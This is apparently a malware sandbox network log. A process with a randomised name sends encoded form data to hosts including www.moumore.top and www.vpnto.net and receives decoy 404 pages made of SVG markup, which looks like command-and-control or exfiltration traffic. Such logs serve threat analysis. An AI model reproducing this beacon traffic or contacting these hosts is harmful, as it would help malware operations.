                                                  Nov 19, 2024 03:56:50.922667980 CET1236INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449985203.161.46.205804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:52.700404882 CET10823OUTPOST /cdzk/ HTTP/1.1
                                                  Host: www.moumore.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 10305
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.moumore.top
                                                  Referer: http://www.moumore.top/cdzk/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 37 33 2b 34 79 7a 6f 78 43 70 47 4d 32 42 35 7a 67 32 44 72 42 55 6c 6a 65 5a 44 35 38 42 6f 48 63 43 32 74 36 31 35 6f 63 72 45 50 36 62 39 62 42 6e 59 55 70 52 61 6a 69 36 75 73 72 33 43 59 42 58 4b 69 77 44 55 6b 42 6e 4e 45 34 46 61 38 6c 30 32 69 77 4c 73 6b 55 75 4e 69 73 57 65 46 63 55 4c 36 77 47 71 7a 44 6a 4c 62 73 6a 77 53 70 59 75 61 52 52 79 36 6f 77 2f 2b 71 59 76 76 77 73 6e 32 6b 4a 70 39 43 73 43 45 73 36 52 77 75 4f 46 74 54 59 4f 49 42 37 4f 56 33 49 53 49 56 49 53 71 38 5a 33 34 44 33 47 4b 68 51 42 4e 65 2f 48 67 53 36 74 47 75 70 47 53 37 61 49 66 33 5a 51 33 55 7a 62 64 55 47 2f 56 4b 77 61 31 76 72 59 79 48 4d 53 47 52 4d 6e 5a 6c 41 72 59 6e 37 36 30 6f 65 6b 44 51 42 33 66 6c 36 65 33 6b 4e 51 72 67 72 30 68 51 65 31 31 68 31 69 74 6d 52 6b 75 77 46 37 74 45 48 63 49 33 61 78 4e 71 33 47 69 4f 62 2b 4a 73 4c 51 4f 72 33 6f 4f 59 6b 78 66 59 43 76 69 35 77 75 75 77 77 63 33 37 51 42 55 44 53 57 58 5a 4c 56 7a 54 32 77 2f 43 2b 31 2f 4f 77 56 45 79 [TRUNCATED]
                                                  Data Ascii: 5lf8fv8H=73+4yzoxCpGM2B5zg2DrBUljeZD58BoHcC2t615ocrEP6b9bBnYUpRaji6usr3CYBXKiwDUkBnNE4Fa8l02iwLskUuNisWeFcUL6wGqzDjLbsjwSpYuaRRy6ow/+qYvvwsn2kJp9CsCEs6RwuOFtTYOIB7OV3ISIVISq8Z34D3GKhQBNe/HgS6tGupGS7aIf3ZQ3UzbdUG/VKwa1vrYyHMSGRMnZlArYn760oekDQB3fl6e3kNQrgr0hQe11h1itmRkuwF7tEHcI3axNq3GiOb+JsLQOr3oOYkxfYCvi5wuuwwc37QBUDSWXZLVzT2w/C+1/OwVEyUHMHjJYEmxp0l6WZ+fRQbnovHhz33qoruCGhcBYu7VyU6mxWlHIu8YryGTqFZaMOsdmXcXzBf7/5nLzDvTMkTDsCUNz1Yi/Excwib8HV3OXdLCl03B38kjBW1yx9WVEhOsLrIRBPrw+i72FX9lmypY5pBY/ddtU8JuTU+Qcq57+/+FgV2LAMOvt3hsCcYhvavxs8fPW+1RFeaz/ekj1Ae9qSiSp8us9KIVK5einN+L2I/9H8wv+55rLIu7BPTLVET/kB5hpUg+NSk5utLAwSXKht1SViXnkK+K3QU1RTYBvTIJa6hbsWNGo1Mi+H7VpuF6ty6ioGD0zumQ+erXSDfADDVBNLpHInB57e3c819fCMhjxse5cm8nFLGDOmWnjbMARkXqm7wscRdfCXmXMXkeo4fV7sU7/BSAGujmx3E4XieDp27dT1qORG8QkTwhZveoBubtMDkhixuwkVW+yi9nFROZZ4Zn5Tr0YUL4IK7UB+UtW5AcY73jRG6RPwsA3G+jm+IgqW21cYANeTxkc5vpWh0bd4h9+akE14ZlKoQ54jraA076KV/3CSdmtqCvuO5dTg5TrEcUn5hzSPCEb8/AUiOOLN5w5Kb7H4FlZ4SP/nn5qAxyotYNR97yZVomTLA0qqL0b5tVO/0u9An2TuyLHVFoQCNUuS05 [TRUNCATED]
                                                  Nov 19, 2024 03:56:53.471395969 CET1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:53 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                  Nov 19, 2024 03:56:53.471466064 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                  Nov 19, 2024 03:56:53.471503973 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                  Nov 19, 2024 03:56:53.471539974 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                  Nov 19, 2024 03:56:53.471579075 CET848INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                  Nov 19, 2024 03:56:53.471724987 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                  Nov 19, 2024 03:56:53.471760035 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                  Nov 19, 2024 03:56:53.471813917 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                  Nov 19, 2024 03:56:53.472039938 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                  Nov 19, 2024 03:56:53.472073078 CET212INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
                                                  Nov 19, 2024 03:56:53.476603031 CET1236INData Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20
                                                  Data Ascii: oin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;f


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.449997203.161.46.205804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:55.242980957 CET461OUTGET /cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d HTTP/1.1
                                                  Host: www.moumore.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Nov 19, 2024 03:56:56.011625051 CET1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:55 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                  Nov 19, 2024 03:56:56.011704922 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                  Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                  Nov 19, 2024 03:56:56.011743069 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                  Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                  Nov 19, 2024 03:56:56.011780024 CET636INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                  Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                  Nov 19, 2024 03:56:56.011816025 CET1236INData Raw: 34 36 37 33 20 39 2e 37 36 30 31 33 32 2c 34 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20
                                                  Data Ascii: 4673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                  Nov 19, 2024 03:56:56.011848927 CET212INData Raw: 2c 31 39 2e 32 34 39 32 31 20 2d 33 2e 33 35 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d
                                                  Data Ascii: ,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1p
                                                  Nov 19, 2024 03:56:56.011890888 CET1236INData Raw: 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a
                                                  Data Ascii: x;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,1
                                                  Nov 19, 2024 03:56:56.011926889 CET212INData Raw: 32 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32
                                                  Data Ascii: 26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -
                                                  Nov 19, 2024 03:56:56.011957884 CET1236INData Raw: 30 2e 34 31 32 35 35 2c 31 32 2e 37 38 39 33 34 20 2d 31 2e 32 33 37 33 31 2c 33 34 2e 31 31 35 33 36 20 2d 32 2e 31 38 30 31 34 2c 35 33 2e 36 32 30 31 35 20 2d 30 2e 39 34 32 38 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33
                                                  Data Ascii: 0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity
                                                  Nov 19, 2024 03:56:56.011995077 CET212INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 34 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20
                                                  Data Ascii: > <path id="path4549" d="m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6
                                                  Nov 19, 2024 03:56:56.017157078 CET1236INData Raw: 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35
                                                  Data Ascii: .95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linec


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.45001691.226.30.3804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:57:01.284641027 CET715OUTPOST /s8dp/ HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 205
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vpnto.net
                                                  Referer: http://www.vpnto.net/s8dp/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 6d 6e 46 31 6a 58 35 6f 35 4c 56 47 52 73 45 75 35 6b 5a 70 47 59 4e 46 6e 50 53 2b 32 5a 6a 44 52 7a 78 37 6d 64 4d 44 61 36 65 76 51 31 4c 2b 46 78 6e 68 41 6f 31 72 62 41 47 5a 6f 30 45 47 4e 62 5a 75 37 75 62 74 49 77 7a 36 2b 50 52 67 69 48 73 72 32 57 65 6f 76 6c 51 52 70 45 4c 6e 6b 69 6c 38 69 75 77 65 30 77 36 51 38 6b 66 77 4b 51 6f 56 33 78 77 2f 5a 51 35 79 49 51 67 79 2f 55 2b 72 56 43 4e 4c 72 62 4c 4a 47 53 42 58 73 30 53 6b 72 64 66 68 2f 66 32 55 4b 75 73 56 35 4a 4f 6c 69 5a 54 39 2f 53 4b 49 55 41 43 78 74 42 41 48 37 2b 2b 5a 52 42 6d 6e 55 55 34 52 65 51 3d 3d
                                                  Data Ascii: 5lf8fv8H=mnF1jX5o5LVGRsEu5kZpGYNFnPS+2ZjDRzx7mdMDa6evQ1L+FxnhAo1rbAGZo0EGNbZu7ubtIwz6+PRgiHsr2WeovlQRpELnkil8iuwe0w6Q8kfwKQoV3xw/ZQ5yIQgy/U+rVCNLrbLJGSBXs0Skrdfh/f2UKusV5JOliZT9/SKIUACxtBAH7++ZRBmnUU4ReQ==


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.45001791.226.30.3804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:57:03.862509012 CET735OUTPOST /s8dp/ HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 225
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vpnto.net
                                                  Referer: http://www.vpnto.net/s8dp/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 6d 6e 46 31 6a 58 35 6f 35 4c 56 47 51 4d 30 75 71 56 5a 70 4e 59 4d 33 73 76 53 2b 38 35 6a 66 52 7a 39 37 6d 63 49 70 61 49 4b 76 58 52 62 2b 4b 55 54 68 44 6f 31 72 44 77 47 63 31 6b 45 64 4e 62 56 6d 37 73 50 74 49 7a 50 36 2b 4b 74 67 69 77 34 6f 6b 57 65 71 6e 46 51 54 74 45 4c 6e 6b 69 6c 38 69 75 6b 30 30 77 69 51 67 45 50 77 4b 78 6f 53 30 78 77 38 63 51 35 79 4d 51 68 37 2f 55 2b 4a 56 44 68 68 72 5a 44 4a 47 54 78 58 73 6c 54 57 6c 64 65 71 78 2f 33 2f 43 72 31 2b 77 34 43 6c 36 34 7a 75 32 77 4f 2b 63 6d 50 72 38 77 68 51 70 2b 61 71 4d 47 76 54 5a 58 46 59 46 51 2f 42 79 37 2b 2f 61 43 45 59 58 66 79 69 57 4d 33 62 61 2b 63 3d
                                                  Data Ascii: 5lf8fv8H=mnF1jX5o5LVGQM0uqVZpNYM3svS+85jfRz97mcIpaIKvXRb+KUThDo1rDwGc1kEdNbVm7sPtIzP6+Ktgiw4okWeqnFQTtELnkil8iuk00wiQgEPwKxoS0xw8cQ5yMQh7/U+JVDhhrZDJGTxXslTWldeqx/3/Cr1+w4Cl64zu2wO+cmPr8whQp+aqMGvTZXFYFQ/By7+/aCEYXfyiWM3ba+c=


